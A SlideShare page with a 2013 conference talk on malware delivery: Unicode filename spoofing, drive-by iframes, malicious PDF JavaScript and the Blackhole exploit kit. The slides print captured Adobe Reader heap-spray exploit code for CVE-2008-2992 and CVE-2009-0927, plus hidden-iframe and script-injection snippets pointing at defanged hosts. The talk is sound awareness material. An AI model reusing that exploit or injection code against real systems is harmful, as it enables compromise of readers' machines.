SlideShare una empresa de Scribd logo
1 de 55
Descargar para leer sin conexión
Dr. Strangelove or: How I Learned
to Stop Worrying and Love
Malware
Matthias Schmidt
Quid est Malware?
06/03/14 2Matthias Schmidt - Entwicklertag 2013
Viruses
Adware
Trojans
Worms
Ransomware
Rootkits
Spyware
Dialers
Keyloggers
Malware
06/03/14 3Matthias Schmidt - Entwicklertag 2013
Malware – why bother?
06/03/14 4Matthias Schmidt - Entwicklertag 2013
Personal Motivation
06/03/14 5Matthias Schmidt - Entwicklertag 2013
Although evil, Malware
is usually Art
06/03/14 6Matthias Schmidt - Entwicklertag 2013
Business Motivation
06/03/14 7Matthias Schmidt - Entwicklertag 2013
Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
06/03/14 8Matthias Schmidt - Entwicklertag 2013
Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
06/03/14 9Matthias Schmidt - Entwicklertag 2013
And for anybody else,
there is …
06/03/14 10Matthias Schmidt - Entwicklertag 2013
MasterCard
Latest AV Software $ 50
Update for 2 years $ 75
Loosing all your data Priceless
06/03/14 11Matthias Schmidt - Entwicklertag 2013
Infection - Classics
06/03/14 12Matthias Schmidt - Entwicklertag 2013
Email Attachment
06/03/14 13Matthias Schmidt - Entwicklertag 2013
Malicious URLs
06/03/14 14Matthias Schmidt - Entwicklertag 2013
Malicious Download
06/03/14 15Matthias Schmidt - Entwicklertag 2013
Infection –
Next Generation[TM]
06/03/14 16Matthias Schmidt - Entwicklertag 2013
Everybody loves
images, right?
06/03/14 17Matthias Schmidt - Entwicklertag 2013
U+202e anyone?
$ stat EmmaWatsonS<202e>gpj.exe
File: `EmmaWatsonSgpj.exe'
Size: 3 Blocks: 8 IO Block: 4096 regular file
Device: 804h/2052d Inode: 9047185 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 1000/m) Gid: ( 1000/m)
[…]
06/03/14 18Matthias Schmidt - Entwicklertag 2013
U+202e: Unicode Character 'RIGHT-
TO-LEFT OVERRIDE‘
HTML Entity &#x202e
Windows Alt + 202E
UTF-32 0x0000202E
C/C++/Java "u202E"
Python u"u202E"
06/03/14 19Matthias Schmidt - Entwicklertag 2013
Drive by Download
06/03/14 20Matthias Schmidt - Entwicklertag 2013
<iframe
src="hxxp://tissot333.cn/eleonore/index.php"
width="0" height="0" frameborder="0">
</iframe>
06/03/14 21Matthias Schmidt - Entwicklertag 2013
Custom exploit
depending on the
victim’s environment
06/03/14 22Matthias Schmidt - Entwicklertag 2013
It’s no longer necessary
to click!
06/03/14 23Matthias Schmidt - Entwicklertag 2013
Java to the rescue
Source: Oracle JDK Security Vulnerabilities, CVE Details, 2013
06/03/14 24Matthias Schmidt - Entwicklertag 2013
Did I mention Flash?
Source: Adobe Flash Security Vulnerabilities, CVE Details, 2013
06/03/14 25Matthias Schmidt - Entwicklertag 2013
Embedded Malware
06/03/14 26Matthias Schmidt - Entwicklertag 2013
Source: Microsoft MSDN
06/03/14 28Matthias Schmidt - Entwicklertag 2013
We learned from the macro
virus decade – right?
06/03/14 29Matthias Schmidt - Entwicklertag 2013
Unfortunately not
“One of the easiest and most powerful ways to
customize PDF files is by using JavaScript […]
JavaScript in Adobe Acrobat software implements
objects, methods, and properties that enable you to
manipulate PDF files, produce database-driven PDF
files, modify the appearance of PDF files, and much
more.”
Source: https://www.adobe.com/devnet/acrobat/javascript.html
06/03/14 30Matthias Schmidt - Entwicklertag 2013
What could possibly go
wrong?
06/03/14 31Matthias Schmidt - Entwicklertag 2013
Size: 12573 bytes
Version: 1.6
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 9
Streams: 2
Comments: 0
Errors: 1
Version 0:
Catalog: 21
Info: No
Objects (9): [7, 21, 23, 24, 25, 26, 28, 60, 76]
Streams (2): [26, 60]
Encoded (2): [26, 60]
Objects with JS code (1): [76]
Suspicious elements:
/AcroForm: [21]
/Names: [21, 24]
/JavaScript: [23, 25, 76]
/JS: [25, 76]
06/03/14 32Matthias Schmidt - Entwicklertag 2013
Object 76
x='e';
arr='13@62@[...]@73';    // Very looong line
cc={q:'EVt;S.&<kgUAvi2pm*"IW5rxya7Gw6n/Q9lqM%{DPN[@d>-|
e43K]"h,zu+j18fo :(b)cs_=}C0'}.q;
q=x+'v'+'al';
a=(Date+String).substr(2,3);
aa=([].unshift+[].reverse).substr(2,3);
if (aa==a){
t='3vtwe';
e=t['substr'];
w=e(12)[q];
s=[];
ar=arr.split('@');
n=cc;
for(i=0;i<ar.length;i++){
s[i]=n[ar[i]];
}
if(a===aa)w(s.join(''));
}
06/03/14 33Matthias Schmidt - Entwicklertag 2013
→
if(e("1"))bjsg="%u8366%[…]%u0000";function ezvr(ra,qy){while(ra.length*2<qy)
{ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var
vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var
qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-
0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var
overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} function printf()
{nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var
payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A
%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray)
{bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-
spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new
Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var
num=1299999999999999999988[…]88;util.printf("%45000f",num);} function geticon(){var arry=new
Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var
hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var
yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-
0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++)
{arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000)
{tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var
i=0;i<aPlugins.length;i++){if(aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||
(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a()
{util.printd("p@111111111111111111111111 : yyyy111",new Date());}var h=app.plugIns;for(var
f=0;f<h.length;f++){if(h[f].name=="EScript"){var i=h[f].version;}} if((i>8.12)&&(i<8.2))
{c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);while(d.length<=0x8000)
{d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++)
{c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
06/03/14 34Matthias Schmidt - Entwicklertag 2013
→
[…]
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i++) {
    if (aPlugins[i].name == "EScript") {
        var lv = aPlugins[i].version;
    }
}
[…]
if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) {
    geticon();
} else if (lv == 7.1) {
    printf();
} else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) {
    bx();
} else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) ||
   (lv <= 8.17)) {
[…]
06/03/14 35Matthias Schmidt - Entwicklertag 2013
→
function printf() {
    nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var payload = unescape(bjsg);
    heapblock = nop + payload;
    bigblock = unescape("%u0A0A%u0A0A");
    headersize = 20;
    spray = headersize + heapblock.length;
    while (bigblock.length < spray) {
        bigblock += bigblock;
    }
    […]
    util.printf("%45000f", num);
}
function geticon() {
    var arry = new Array();
    if (app.doc.Collab.getIcon) {
        var payload = unescape(bjsg);
        var yarsp = unescape("%u9090%u9090");
        yarsp = ezvr(yarsp, qy);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        […]
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++)
            arry[vqcQD96y] = yarsp + payload;
[…]
app.doc.Collab.getIcon(tUMhNbGw);
}
CVE-2008-2992
Adobe Reader
'util.printf()'
JavaScript Function
Stack Buffer Overflow
Vulnerability
CVE-2009-0927
Adobe Acrobat and
Reader Collab
'getIcon()'
JavaScript Method
Remote Code
Execution
Vulnerability
06/03/14 36Matthias Schmidt - Entwicklertag 2013
Automagical[TM]
Delivery
06/03/14 38Matthias Schmidt - Entwicklertag 2013
Linux/Cdorked.A
06/03/14 39Matthias Schmidt - Entwicklertag 2013
Random redirect –
once per day
per IP address
06/03/14 40Matthias Schmidt - Entwicklertag 2013
Features an IP address
blacklist and reacts according
to the victim’s Internet
browser’s language
06/03/14 41Matthias Schmidt - Entwicklertag 2013
Exploit Kits
Nice Pack
Cool EK Blackhole
Red Dot
Sweet Orange
Whitehole
Neutrino
06/03/14 42Matthias Schmidt - Entwicklertag 2013
Lego bricks for evil
people
Features
• Graphical User Interface
• Bot management
• Fully encrypted communication
• Latest exploit updates
• Infos about installed AV software
• …
06/03/14 43Matthias Schmidt - Entwicklertag 2013
Black Hole – Celebrity of
the Exploit Kits
06/03/14 44Matthias Schmidt - Entwicklertag 2013
Responsible for most web threats in
2012
First appeared on Russian
underground forums
Up to date licensing policy
Licenses:
• Annual license: $ 1500
• Half-year license: $ 1000
• 3-month license: $ 700
During the term of the license all the updates are
free.
Rent on our server:
• 1 week (7 full days): $ 200
• 2 weeks (14 full days): $ 300
• 3 weeks (21 full day): $ 400
• 4 weeks (31 full day): $ 500
Source: Inside a Black Hole, Gabor Szappanos, Principal Researcher, SophosLabs
06/03/14 46Matthias Schmidt - Entwicklertag 2013
Backhole - Infection
06/03/14 49Matthias Schmidt - Entwicklertag 2013
Victim receives a URL
06/03/14 50Matthias Schmidt - Entwicklertag 2013
Victim receives a URL –
and clicks on it
06/03/14 51Matthias Schmidt - Entwicklertag 2013
URL is redirected
through intermediate
sites
06/03/14 52Matthias Schmidt - Entwicklertag 2013
<script language=”JavaScript” type=”text/JavaScript”
src=”hxxp://www.grapevalleytours.com.au/ajaxam.js”>
</script>
<script language=”JavaScript” type=”text/JavaScript”
src=”hxxp://www.womenetcetera.com/ajaxam.js”>
</script>
<script language=”JavaScript” type=”text/JavaScript”
src=”hxxp://levillagesaintpaul.com/ccounter.js”>
</script>
<script language=”JavaScript” type=”text/JavaScript”
src=”hxxp://fasttrialpayments.com/kquery.js”>
</script>
06/03/14 53Matthias Schmidt - Entwicklertag 2013
Blackhole server at the
end of the chain
06/03/14 54Matthias Schmidt - Entwicklertag 2013
Format:
http://{server}/{mainfile}?
{threadid}={random hex digits}
Example:
hxxp://matocrossing.com/main.php?
page=206133a43dda613f
06/03/14 55Matthias Schmidt - Entwicklertag 2013
Server delivers custom
exploit code
06/03/14 56Matthias Schmidt - Entwicklertag 2013
06/03/14 57Matthias Schmidt - Entwicklertag 2013
Recommendations
Train/gain more
awareness
Remove/disable
browser plugins
Don’t forget the
worst case
06/03/14 58Matthias Schmidt - Entwicklertag 2013
Thank you!
06/03/14 Matthias Schmidt - Entwicklertag 2013 59
Q&A
Matthias Schmidt
@_xhr_
06/03/14 60Matthias Schmidt - Entwicklertag 2013

Más contenido relacionado

Destacado

BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machineAlexei Starovoitov
 
Introduction to ARM mbed-OS 3.0 uvisor
Introduction to ARM mbed-OS 3.0 uvisorIntroduction to ARM mbed-OS 3.0 uvisor
Introduction to ARM mbed-OS 3.0 uvisorViller Hsiao
 
Trace kernel code tips
Trace kernel code tipsTrace kernel code tips
Trace kernel code tipsViller Hsiao
 
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)SDN Scale-out Testing at OpenStack Innovation Center (OSIC)
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)PLUMgrid
 
Metasploit3 - David Calligaris
Metasploit3 - David CalligarisMetasploit3 - David Calligaris
Metasploit3 - David CalligarisDaniele Albrizio
 
Africa 2013: Cyber-Crime, Hacking & Malware
Africa 2013: Cyber-Crime, Hacking & MalwareAfrica 2013: Cyber-Crime, Hacking & Malware
Africa 2013: Cyber-Crime, Hacking & MalwareIDG Connect
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Insights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportInsights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportCyren, Inc
 
Cyber Security Guide
Cyber Security GuideCyber Security Guide
Cyber Security GuideChris Roche
 
Webinar: How hackers are making your security obsolete
Webinar: How hackers are making your security obsoleteWebinar: How hackers are making your security obsolete
Webinar: How hackers are making your security obsoleteCyren, Inc
 
Un tesoro nascosto nella linea di comando
Un tesoro nascosto nella linea di comandoUn tesoro nascosto nella linea di comando
Un tesoro nascosto nella linea di comandoDaniele Albrizio
 
CYREN_2015_CyberThreat_Yearbook
CYREN_2015_CyberThreat_YearbookCYREN_2015_CyberThreat_Yearbook
CYREN_2015_CyberThreat_YearbookChristian Reuter
 
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]RootedCON
 
Webinar: Insights from Cyren's 2016 cyberthreat report
Webinar: Insights from Cyren's 2016 cyberthreat reportWebinar: Insights from Cyren's 2016 cyberthreat report
Webinar: Insights from Cyren's 2016 cyberthreat reportCyren, Inc
 
ebpf and IO Visor: The What, how, and what next!
ebpf and IO Visor: The What, how, and what next!ebpf and IO Visor: The What, how, and what next!
ebpf and IO Visor: The What, how, and what next!Affan Syed
 
2015 ISA Calgary Show: IACS Cyber Incident Preparation
2015 ISA Calgary Show: IACS Cyber Incident Preparation2015 ISA Calgary Show: IACS Cyber Incident Preparation
2015 ISA Calgary Show: IACS Cyber Incident PreparationCimation
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the GatewaysOnur Alanbel
 
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile MalwareUpwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile MalwarePriyanka Aash
 

Destacado (20)

BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machine
 
Introduction to ARM mbed-OS 3.0 uvisor
Introduction to ARM mbed-OS 3.0 uvisorIntroduction to ARM mbed-OS 3.0 uvisor
Introduction to ARM mbed-OS 3.0 uvisor
 
Trace kernel code tips
Trace kernel code tipsTrace kernel code tips
Trace kernel code tips
 
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)SDN Scale-out Testing at OpenStack Innovation Center (OSIC)
SDN Scale-out Testing at OpenStack Innovation Center (OSIC)
 
Metasploit3 - David Calligaris
Metasploit3 - David CalligarisMetasploit3 - David Calligaris
Metasploit3 - David Calligaris
 
Africa 2013: Cyber-Crime, Hacking & Malware
Africa 2013: Cyber-Crime, Hacking & MalwareAfrica 2013: Cyber-Crime, Hacking & Malware
Africa 2013: Cyber-Crime, Hacking & Malware
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Insights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportInsights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend Report
 
Cyber Security Guide
Cyber Security GuideCyber Security Guide
Cyber Security Guide
 
Art of Exploit Writing
Art of Exploit WritingArt of Exploit Writing
Art of Exploit Writing
 
3DC _E_Brochure
3DC _E_Brochure3DC _E_Brochure
3DC _E_Brochure
 
Webinar: How hackers are making your security obsolete
Webinar: How hackers are making your security obsoleteWebinar: How hackers are making your security obsolete
Webinar: How hackers are making your security obsolete
 
Un tesoro nascosto nella linea di comando
Un tesoro nascosto nella linea di comandoUn tesoro nascosto nella linea di comando
Un tesoro nascosto nella linea di comando
 
CYREN_2015_CyberThreat_Yearbook
CYREN_2015_CyberThreat_YearbookCYREN_2015_CyberThreat_Yearbook
CYREN_2015_CyberThreat_Yearbook
 
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
 
Webinar: Insights from Cyren's 2016 cyberthreat report
Webinar: Insights from Cyren's 2016 cyberthreat reportWebinar: Insights from Cyren's 2016 cyberthreat report
Webinar: Insights from Cyren's 2016 cyberthreat report
 
ebpf and IO Visor: The What, how, and what next!
ebpf and IO Visor: The What, how, and what next!ebpf and IO Visor: The What, how, and what next!
ebpf and IO Visor: The What, how, and what next!
 
2015 ISA Calgary Show: IACS Cyber Incident Preparation
2015 ISA Calgary Show: IACS Cyber Incident Preparation2015 ISA Calgary Show: IACS Cyber Incident Preparation
2015 ISA Calgary Show: IACS Cyber Incident Preparation
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the Gateways
 
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile MalwareUpwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware
 

Similar a Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware

Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?
Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?
Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?TEO LT, AB
 
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...RootedCON
 
Cite conference intralinks_industrialization_or_consumerization_final
Cite conference intralinks_industrialization_or_consumerization_finalCite conference intralinks_industrialization_or_consumerization_final
Cite conference intralinks_industrialization_or_consumerization_finalIntralinks
 
Big Data and Fast Data – Big and Fast Combined, is it Possible?
Big Data and Fast Data – Big and Fast Combined, is it Possible?Big Data and Fast Data – Big and Fast Combined, is it Possible?
Big Data and Fast Data – Big and Fast Combined, is it Possible?Guido Schmutz
 
January 2023 CIAOPS Need to Know Webinar
January 2023 CIAOPS Need to Know WebinarJanuary 2023 CIAOPS Need to Know Webinar
January 2023 CIAOPS Need to Know WebinarRobert Crane
 
Lecture #18 - #20: Web Browser and Web Application Security
Lecture #18 - #20: Web Browser and Web Application SecurityLecture #18 - #20: Web Browser and Web Application Security
Lecture #18 - #20: Web Browser and Web Application SecurityDr. Ramchandra Mangrulkar
 
A tale story of building and maturing threat hunting program
A tale story of building and maturing threat hunting programA tale story of building and maturing threat hunting program
A tale story of building and maturing threat hunting programidsecconf
 
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...Lumension
 
MaureenYoder CMTC2023 ChatGPT
MaureenYoder CMTC2023 ChatGPTMaureenYoder CMTC2023 ChatGPT
MaureenYoder CMTC2023 ChatGPTmaureenyoder
 
chatgpt-privacy and security.pptx
chatgpt-privacy and security.pptxchatgpt-privacy and security.pptx
chatgpt-privacy and security.pptxDeepak Kumar
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksCiNPA Security SIG
 
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...Hunter Carlisle
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security ToolsTomasz Poszytek
 
Leverage Endpooint Visibilit with MITRE ATT&CK Framework
Leverage Endpooint Visibilit with MITRE ATT&CK FrameworkLeverage Endpooint Visibilit with MITRE ATT&CK Framework
Leverage Endpooint Visibilit with MITRE ATT&CK FrameworkDigit Oktavianto
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutDevSecCon
 
Elastic user group London nov 2019
Elastic user group London nov 2019Elastic user group London nov 2019
Elastic user group London nov 2019Andrey Bezverkhiy
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting ProgramDigit Oktavianto
 

Similar a Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware (20)

Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?
Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?
Mehis Hakkaja. Kaip gali būti įsilaužta į Jūsų kompiuterį?
 
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...
Jeremy Brown & David Seidman - Microsoft Vulnerability Research: How to be a ...
 
Cite conference intralinks_industrialization_or_consumerization_final
Cite conference intralinks_industrialization_or_consumerization_finalCite conference intralinks_industrialization_or_consumerization_final
Cite conference intralinks_industrialization_or_consumerization_final
 
Big Data and Fast Data – Big and Fast Combined, is it Possible?
Big Data and Fast Data – Big and Fast Combined, is it Possible?Big Data and Fast Data – Big and Fast Combined, is it Possible?
Big Data and Fast Data – Big and Fast Combined, is it Possible?
 
January 2023 CIAOPS Need to Know Webinar
January 2023 CIAOPS Need to Know WebinarJanuary 2023 CIAOPS Need to Know Webinar
January 2023 CIAOPS Need to Know Webinar
 
Lecture #18 - #20: Web Browser and Web Application Security
Lecture #18 - #20: Web Browser and Web Application SecurityLecture #18 - #20: Web Browser and Web Application Security
Lecture #18 - #20: Web Browser and Web Application Security
 
A tale story of building and maturing threat hunting program
A tale story of building and maturing threat hunting programA tale story of building and maturing threat hunting program
A tale story of building and maturing threat hunting program
 
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...
The Evolution of Advanced Persistent Threats_The Current Risks and Mitigation...
 
MaureenYoder CMTC2023 ChatGPT
MaureenYoder CMTC2023 ChatGPTMaureenYoder CMTC2023 ChatGPT
MaureenYoder CMTC2023 ChatGPT
 
chatgpt-privacy and security.pptx
chatgpt-privacy and security.pptxchatgpt-privacy and security.pptx
chatgpt-privacy and security.pptx
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...
Secure Machine Learning: Overcoming Algorithmic Bias, Adversarial ML, and Oth...
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
 
Leverage Endpooint Visibilit with MITRE ATT&CK Framework
Leverage Endpooint Visibilit with MITRE ATT&CK FrameworkLeverage Endpooint Visibilit with MITRE ATT&CK Framework
Leverage Endpooint Visibilit with MITRE ATT&CK Framework
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert Hurlbut
 
Elastic user group London nov 2019
Elastic user group London nov 2019Elastic user group London nov 2019
Elastic user group London nov 2019
 
Attack Vectors in Biometric Recognition Systems
Attack Vectors in Biometric Recognition SystemsAttack Vectors in Biometric Recognition Systems
Attack Vectors in Biometric Recognition Systems
 
Traning security 2013
Traning security 2013Traning security 2013
Traning security 2013
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
 
CMS Hacking
CMS Hacking CMS Hacking
CMS Hacking
 

Último

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
